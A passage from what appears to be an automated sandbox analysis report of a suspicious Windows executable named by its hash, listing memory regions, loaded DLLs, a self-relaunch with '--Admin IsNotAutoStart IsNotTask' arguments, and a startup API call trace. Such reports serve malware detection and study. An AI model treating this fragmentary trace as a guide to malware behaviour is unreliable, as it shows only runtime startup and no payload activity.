"\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 880 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 881 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 882 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 883 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 884 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 885 start_va = 0x1d0000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 886 start_va = 0x3c0000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 887 start_va = 0x2b0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 888 start_va = 0x490000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 889 start_va = 0x630000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 890 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 891 start_va = 0x748a0000 end_va = 0x748c0fff monitored = 0 entry_point = 0x748a145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 892 start_va = 0x75b90000 end_va = 0x75bd4fff monitored = 0 entry_point = 0x75b911e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 893 start_va = 0x20000 end_va = 0x25fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "icacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ICacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\icacls.exe.mui") Thread: id = 63 os_tid = 0xf14 Thread: id = 64 os_tid = 0xf18 Process: id = "5" image_name = "1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" filename = "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" page_root = "0x425b7000" os_pid = "0xf20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xee8" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 928 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 929 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 930 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 931 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 932 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 933 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 934 start_va = 0x400000 end_va = 0x253bfff monitored = 1 entry_point = 0x498550 region_type = mapped_file name = "1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") Region: id = 935 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 936 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 937 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 938 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 939 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 940 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 941 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 942 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 943 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 944 start_va = 0x1a0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 945 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 946 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 947 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 948 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 949 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 950 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 951 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 952 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 953 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 954 start_va = 0x2540000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 955 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 956 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 957 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 958 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 959 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 960 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 961 start_va = 0x360000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 962 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 963 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 964 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 965 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 966 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 967 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 968 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 969 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 970 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 971 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 972 start_va = 0x2800000 end_va = 0x29dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 973 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 974 start_va = 0x2540000 end_va = 0x26c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002540000" filename = "" Region: id = 975 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 976 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 977 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 978 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 979 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 980 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 981 start_va = 0x210000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 982 start_va = 0x2800000 end_va = 0x2980fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002800000" filename = "" Region: id = 983 start_va = 0x29d0000 end_va = 0x29dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029d0000" filename = "" Region: id = 984 start_va = 0x29e0000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029e0000" filename = "" Region: id = 985 start_va = 0x240000 end_va = 0x2d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 986 start_va = 0x3de0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003de0000" filename = "" Region: id = 987 start_va = 0x210000 end_va = 0x214fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 988 start_va = 0x230000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 989 start_va = 0x210000 end_va = 0x214fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 990 start_va = 0x3de0000 end_va = 0x3efafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003de0000" filename = "" Region: id = 991 start_va = 0x73a10000 end_va = 0x73a8ffff monitored = 0 entry_point = 0x73a237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 992 start_va = 0x3f00000 end_va = 0x40effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 993 start_va = 0x3f00000 end_va = 0x3fdefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f00000" filename = "" Region: id = 994 start_va = 0x40b0000 end_va = 0x40effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 995 start_va = 0x739f0000 end_va = 0x73a02fff monitored = 0 entry_point = 0x739f1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 996 start_va = 0x210000 end_va = 0x212fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 997 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Thread: id = 66 os_tid = 0xf24 [0094.977] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x954b3620, dwHighDateTime=0x1d8a8b9)) [0094.977] GetCurrentProcessId () returned 0xf20 [0094.977] GetCurrentThreadId () returned 0xf24 [0094.977] GetTickCount () returned 0xe67c74 [0094.977] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=1522017966076) returned 1 [0094.979] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x49ee10)) [0094.979] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.979] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x230000 [0094.981] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0094.981] GetProcAddress (hModule=0x752b0000, lpProcName="FlsAlloc") returned 0x752c4ee3 [0094.981] GetProcAddress (hModule=0x752b0000, lpProcName="FlsGetValue") returned 0x752c1252 [0094.981] GetProcAddress (hModule=0x752b0000, lpProcName="FlsSetValue") returned 0x752c41c0 [0094.981] GetProcAddress (hModule=0x752b0000, lpProcName="FlsFree") returned 0x752c354f [0094.983] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x214) returned 0x2307d0 [0094.983] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x752b0000 [0094.983] GetCurrentThreadId () returned 0xf24 [0094.983] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x49a6f6, hStdOutput=0x49aa2f, hStdError=0x2307d0)) [0094.984] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x800) returned 0x2309f0 [0094.984] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0094.984] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0094.984] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0094.984] SetHandleCount (uNumber=0x20) returned 0x20 [0094.984] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --Admin IsNotAutoStart IsNotTask" [0094.984] GetEnvironmentStringsW () returned 0x2711f50* [0094.984] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0xb0e) returned 0x2311f8 [0094.984] FreeEnvironmentStringsW (penv=0x2711f50) returned 1 [0094.984] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x252b980, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe")) returned 0x5f [0094.984] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x116) returned 0x231d10 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x98) returned 0x231e30 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3e) returned 0x231ed0 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x56) returned 0x231f18 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x6e) returned 0x231f78 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x78) returned 0x231ff0 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x62) returned 0x232070 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x30) returned 0x2320e0 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x48) returned 0x232118 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x28) returned 0x232168 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1a) returned 0x232198 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x34) returned 0x2321c0 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x5c) returned 0x232200 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x32) returned 0x232268 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2e) returned 0x2322a8 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1c) returned 0x2322e0 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x12a) returned 0x232308 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x7c) returned 0x232440 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x36) returned 0x2324c8 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3a) returned 0x232508 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x90) returned 0x232550 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x24) returned 0x2325e8 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x30) returned 0x232618 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x36) returned 0x232650 [0094.985] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x48) returned 0x232690 [0094.986] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x52) returned 0x2326e0 [0094.986] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3c) returned 0x232740 [0094.986] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xd6) returned 0x232788 [0094.986] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2e) returned 0x232868 [0094.986] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1e) returned 0x2328a0 [0094.986] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2c) returned 0x2328c8 [0094.986] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x54) returned 0x232900 [0094.986] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x52) returned 0x232960 [0094.986] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2c) returned 0x2329c0 [0094.986] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x26) returned 0x2329f8 [0094.986] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3e) returned 0x232a28 [0094.986] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x24) returned 0x232a70 [0094.986] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x30) returned 0x232aa0 [0094.987] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x8c) returned 0x232ad8 [0094.988] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x2311f8 | out: hHeap=0x230000) returned 1 [0094.989] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0094.989] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x80) returned 0x232b70 [0094.989] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x800) returned 0x2311f8 [0094.989] GetLastError () returned 0x0 [0094.989] SetLastError (dwErrCode=0x0) [0094.989] GetLastError () returned 0x0 [0094.989] SetLastError (dwErrCode=0x0) [0094.989] GetLastError () returned 0x0 [0094.989] SetLastError (dwErrCode=0x0) [0094.989] GetACP () returned 0x4e4 [0094.989] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x220) returned 0x231a00 [0094.990] GetLastError () returned 0x0 [0094.990] SetLastError (dwErrCode=0x0) [0094.990] IsValidCodePage (CodePage=0x4e4) returned 1 [0094.990] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0094.990] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0094.990] GetLastError () returned 0x0 [0094.990] SetLastError (dwErrCode=0x0) [0094.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0094.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0094.990] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0094.990] GetLastError () returned 0x0 [0094.990] SetLastError (dwErrCode=0x0) [0094.990] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, 